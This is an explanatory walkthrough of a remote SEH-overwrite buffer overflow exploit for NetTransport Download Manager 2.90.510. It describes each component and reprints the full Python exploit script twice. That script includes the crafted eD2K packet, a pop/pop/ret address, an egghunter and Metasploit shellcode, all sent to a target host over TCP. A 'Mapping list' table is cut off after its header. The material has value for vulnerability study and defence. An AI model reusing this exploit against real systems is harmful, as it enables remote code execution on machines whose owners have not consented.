NetTransport Download Manager 2.90.510 SEH Remote Overflow Explained

What this paper is

This paper details a security vulnerability in NetTransport Download Manager version 2.90.510. Specifically, it describes a remote buffer overflow that can be triggered by sending a specially crafted network packet. Successful exploitation allows an attacker to execute arbitrary code on the target system with the privileges of the running NetTransport process. The exploit leverages Structured Exception Handling (SEH) overwrite techniques to gain control of the program's execution flow.

Simple technical breakdown

The core of the vulnerability lies in how NetTransport handles incoming network data on its eD2K (eMule) port. The program doesn't properly validate the size or content of certain data structures within these packets. An attacker can send a packet that is larger than expected, causing a buffer overflow. This overflow overwrites critical control information on the program's stack, including the SEH chain.

The exploit targets the SEH handler. When an exception occurs (which the overflow can trigger), the program attempts to use the SEH handler to recover. By overwriting the SEH handler's address with a pointer to attacker-controlled code, the program jumps to the attacker's shellcode instead of a legitimate handler.

The exploit uses a two-stage approach:

1. Egghunter: A small piece of shellcode designed to search for a specific "egg" pattern (like "c00lc00l") within the process's memory. This is necessary because the exact location of the main shellcode might vary.
2. Main Shellcode: The primary payload, which in this case is designed to execute calc.exe.

Complete code and payload walkthrough

The provided Python script constructs and sends the malicious packet. Let's break down the key components:

#!/usr/bin/python

#########################
#NetTransport Download Manager version:2.90.510 0day
#Discovered by Lincoln
#Tested on Windows XP SP3
#
#eMule file sharing protocol
#SEH overwrite, leaves only 60 or so bytes after p/p/r
#egghunter is used to find sc (calc.exe)
#
#root@BT4VM:~# ./netxfer.py 192.168.1.8 31491
#########################

import socket,sys

host = sys.argv[1]
port = int(sys.argv[2]) #eD2K port

• Header Comments: Provide context about the vulnerability, target version, discovery, testing environment (Windows XP SP3), exploit technique (SEH overwrite), and the use of an egghunter. It also shows an example of how to run the script.
• import socket,sys: Imports necessary Python modules for network communication (socket) and accessing command-line arguments (sys).
• host = sys.argv[1]: Retrieves the target IP address from the first command-line argument.
• port = int(sys.argv[2]): Retrieves the target port number from the second command-line argument and converts it to an integer. The comment indicates this is the eD2K port.

# * windows/exec - 200 bytes
# * http://www.metasploit.com
# * EXITFUNC=thread, CMD=calc.exe
sc = ("\xfc\xe8\x89\x00\x00\x00\x60\x89\xe5\x31\xd2\x64\x8b\x52\x30"
"\x8b\x52\x0c\x8b\x52\x14\x8b\x72\x28\x0f\xb7\x4a\x26\x31\xff"
"\x31\xc0\xac\x3c\x61\x7c\x02\x2c\x20\xc1\xcf\x0d\x01\xc7\xe2"
"\xf0\x52\x57\x8b\x52\x10\x8b\x42\x3c\x01\xd0\x8b\x40\x78\x85"
"\xc0\x74\x4a\x01\xd0\x50\x8b\x48\x18\x8b\x58\x20\x01\xd3\xe3"
"\x3c\x49\x8b\x34\x8b\x01\xd6\x31\xff\x31\xc0\xac\xc1\xcf\x0d"
"\x01\xc7\x38\xe0\x75\xf4\x03\x7d\xf8\x3b\x7d\x24\x75\xe2\x58"
"\x8b\x58\x24\x01\xd3\x66\x8b\x0c\x4b\x8b\x58\x1c\x01\xd3\x8b"
"\x04\x8b\x01\xd0\x89\x44\x24\x24\x5b\x5b\x61\x59\x5a\x51\xff"
"\xe0\x58\x5f\x5a\x8b\x12\xeb\x86\x5d\x6a\x01\x8d\x85\xb9\x00"
"\x00\x00\x50\x68\x31\x8b\x6f\x87\xff\xd5\xbb\xe0\x1d\x2a\x0a"
"\x68\xa6\x95\xbd\x9d\xff\xd5\x3c\x06\x7c\x0a\x80\xfb\xe0\x75"
"\x05\xbb\x47\x13\x72\x6f\x6a\x00\x53\xff\xd5\x63\x61\x6c\x63"
"\x2e\x65\x78\x65\x00")

• sc = (...): This variable holds the main shellcode.
  • The comments indicate it's a windows/exec payload from Metasploit, approximately 200 bytes, configured to exit using EXITFUNC=thread and execute calc.exe.
  • The byte string (\xfc\...) is the actual machine code. This shellcode typically performs the following actions:
    • Initialization: Sets up registers, gets pointers to kernel32.dll and other necessary functions.
    • String Manipulation: Locates the string "calc.exe" within its own code.
    • Execution: Uses a Windows API call (like CreateProcess or ShellExecute) to launch calc.exe.
    • Exit: Terminates the thread gracefully.

#magic packet
buf = ("\xe3\x3d\x00\x00\x00\x01\xee\x4f\x08\xe3\x00\x0e\xae\x41\xb0\x24"
"\x89\x38\x1c\xc7\x6f\x6e\x00\x00\x00\x00\xaf\x8d\x04\x00\x00\x00"
"\x02\x01\x00\x01\x04\x00\x74\x65\x73\x74\x03\x01\x00\x11\x3c\x00")

• buf = (...): This variable starts with the "magic packet" or the initial part of the exploit payload.
  • The bytes \xe3\x3d\x00\x00\x00\x01\xee\x4f\x08\xe3\x00\x0e\xae\x41\xb0\x24\x89\x38\x1c\xc7\x6f\x6e\x00\x00\x00\x00\xaf\x8d\x04\x00\x00\x00\x02\x01\x00\x01\x04\x00\x74\x65\x73\x74\x03\x01\x00\x11\x3c\x00 represent the initial data sent to the target. This data likely conforms to the eD2K protocol's initial handshake or a specific message type that triggers the vulnerable parsing logic. The exact meaning of these bytes depends on the NetTransport's implementation of the eD2K protocol. It's designed to be malformed or contain specific values that lead to the buffer overflow.

#egg =  c00lc00l
egghunter = ("\x66\x81\xCA\xFF\x0F\x42\x52\x6A\x02\x58\xCD\x2E\x3C\x05\x5A\x74\xEF\xB8"
"\x63\x30\x30\x6c\x8B\xFA\xAF\x75\xEA\xAF\x75\xE7\xFF\xE7")

• egghunter = (...): This variable contains the egghunter shellcode.
  • The comment egg = c00lc00l indicates the "egg" string the egghunter will search for.
  • The byte string (\x66\...) is the egghunter's machine code. Its typical function is:
    • Search Loop: Iterates through memory addresses.
    • Pattern Matching: Compares chunks of memory with the "egg" string ("c00lc00l").
    • Jump: Once the egg is found, it jumps to the address immediately following the egg, which is where the main shellcode is expected to be.
    • System Calls: Uses system calls (like int 0x2E on older Windows) to perform memory access and comparisons.

#p/p/r 10002a57 libssl.dll
buf+= "\x41" * 119 + "\xeb\x06\x90\x90" + "\x57\x2a\x00\x10" + "\x90" * 10 + egghunter
buf+= "\x90" * 50 + "c00lc00l" + "\x90" * 20 + sc + "\x90" * 2000

• buf += ...: This is where the exploit payload is assembled and appended to the initial buf.
  • "\x41" * 119: This is 119 bytes of 'A' characters. These bytes fill the buffer up to the point where the SEH handler's address is stored. This is the "padding" before the SEH overwrite.
  • "\xeb\x06\x90\x90": This is a short jump instruction (\xeb\x06 means jump 6 bytes forward) followed by two NOPs (\x90). This is a common technique to create a small "jump stub" that can be placed before the SEH handler.
  • "\x57\x2a\x00\x10": This is the crucial part: the overwritten SEH handler address. The comment p/p/r 10002a57 libssl.dll suggests this is the address of a "pop, pop, ret" (PPR) instruction sequence within libssl.dll (likely part of OpenSSL or a similar library used by NetTransport). This sequence is used to clean up the stack after the exception is handled and then jump to the next instruction, which will be the egghunter. The address 0x10002a57 is a specific location within libssl.dll in the context of Windows XP SP3.
  • "\x90" * 10: Ten NOP instructions to provide some breathing room.
  • egghunter: The egghunter shellcode is appended here.
  • "\x90" * 50: More NOPs for padding.
  • "c00lc00l": The "egg" string. The egghunter will search for this.
  • "\x90" * 20: More NOPs.
  • sc: The main shellcode (calc.exe execution) is appended.
  • "\x90" * 2000: A large block of NOPs at the end. This provides a large area for the egghunter to search within and ensures that the main shellcode is located after the egg.

s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((host, port))
s.send(buf)
print "\nExploit Sent!! Give the egghunter a few seconds to find the shellcode\r\n"
s.close()

• s = socket.socket(socket.AF_INET, socket.SOCK_STREAM): Creates a new TCP socket.
• s.connect((host, port)): Connects the socket to the target host and port.
• s.send(buf): Sends the complete crafted buf (the exploit payload) over the network.
• print ...: Informs the user that the exploit has been sent and that they should wait for the egghunter to find the shellcode.
• s.close(): Closes the network connection.

Mapping list:

| Code Fragment/Block | Practical Purpose

Original Exploit-DB Content (Verbatim)

#!/usr/bin/python

#########################
#NetTransport Download Manager version:2.90.510 0day
#Discovered by Lincoln
#Tested on Windows XP SP3
#
#eMule file sharing protocol
#SEH overwrite, leaves only 60 or so bytes after p/p/r
#egghunter is used to find sc (calc.exe)
#
#root@BT4VM:~# ./netxfer.py 192.168.1.8 31491
#########################

import socket,sys

host = sys.argv[1]
port = int(sys.argv[2]) #eD2K port

# * windows/exec - 200 bytes
# * http://www.metasploit.com
# * EXITFUNC=thread, CMD=calc.exe
sc = ("\xfc\xe8\x89\x00\x00\x00\x60\x89\xe5\x31\xd2\x64\x8b\x52\x30"
"\x8b\x52\x0c\x8b\x52\x14\x8b\x72\x28\x0f\xb7\x4a\x26\x31\xff"
"\x31\xc0\xac\x3c\x61\x7c\x02\x2c\x20\xc1\xcf\x0d\x01\xc7\xe2"
"\xf0\x52\x57\x8b\x52\x10\x8b\x42\x3c\x01\xd0\x8b\x40\x78\x85"
"\xc0\x74\x4a\x01\xd0\x50\x8b\x48\x18\x8b\x58\x20\x01\xd3\xe3"
"\x3c\x49\x8b\x34\x8b\x01\xd6\x31\xff\x31\xc0\xac\xc1\xcf\x0d"
"\x01\xc7\x38\xe0\x75\xf4\x03\x7d\xf8\x3b\x7d\x24\x75\xe2\x58"
"\x8b\x58\x24\x01\xd3\x66\x8b\x0c\x4b\x8b\x58\x1c\x01\xd3\x8b"
"\x04\x8b\x01\xd0\x89\x44\x24\x24\x5b\x5b\x61\x59\x5a\x51\xff"
"\xe0\x58\x5f\x5a\x8b\x12\xeb\x86\x5d\x6a\x01\x8d\x85\xb9\x00"
"\x00\x00\x50\x68\x31\x8b\x6f\x87\xff\xd5\xbb\xe0\x1d\x2a\x0a"
"\x68\xa6\x95\xbd\x9d\xff\xd5\x3c\x06\x7c\x0a\x80\xfb\xe0\x75"
"\x05\xbb\x47\x13\x72\x6f\x6a\x00\x53\xff\xd5\x63\x61\x6c\x63"
"\x2e\x65\x78\x65\x00")

#magic packet
buf = ("\xe3\x3d\x00\x00\x00\x01\xee\x4f\x08\xe3\x00\x0e\xae\x41\xb0\x24"
"\x89\x38\x1c\xc7\x6f\x6e\x00\x00\x00\x00\xaf\x8d\x04\x00\x00\x00"
"\x02\x01\x00\x01\x04\x00\x74\x65\x73\x74\x03\x01\x00\x11\x3c\x00")

#egg =  c00lc00l
egghunter = ("\x66\x81\xCA\xFF\x0F\x42\x52\x6A\x02\x58\xCD\x2E\x3C\x05\x5A\x74\xEF\xB8"
"\x63\x30\x30\x6c\x8B\xFA\xAF\x75\xEA\xAF\x75\xE7\xFF\xE7")

#p/p/r 10002a57 libssl.dll
buf+= "\x41" * 119 + "\xeb\x06\x90\x90" + "\x57\x2a\x00\x10" + "\x90" * 10 + egghunter
buf+= "\x90" * 50 + "c00lc00l" + "\x90" * 20 + sc + "\x90" * 2000

s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((host, port))
s.send(buf)
print "\nExploit Sent!! Give the egghunter a few seconds to find the shellcode\r\n"
s.close()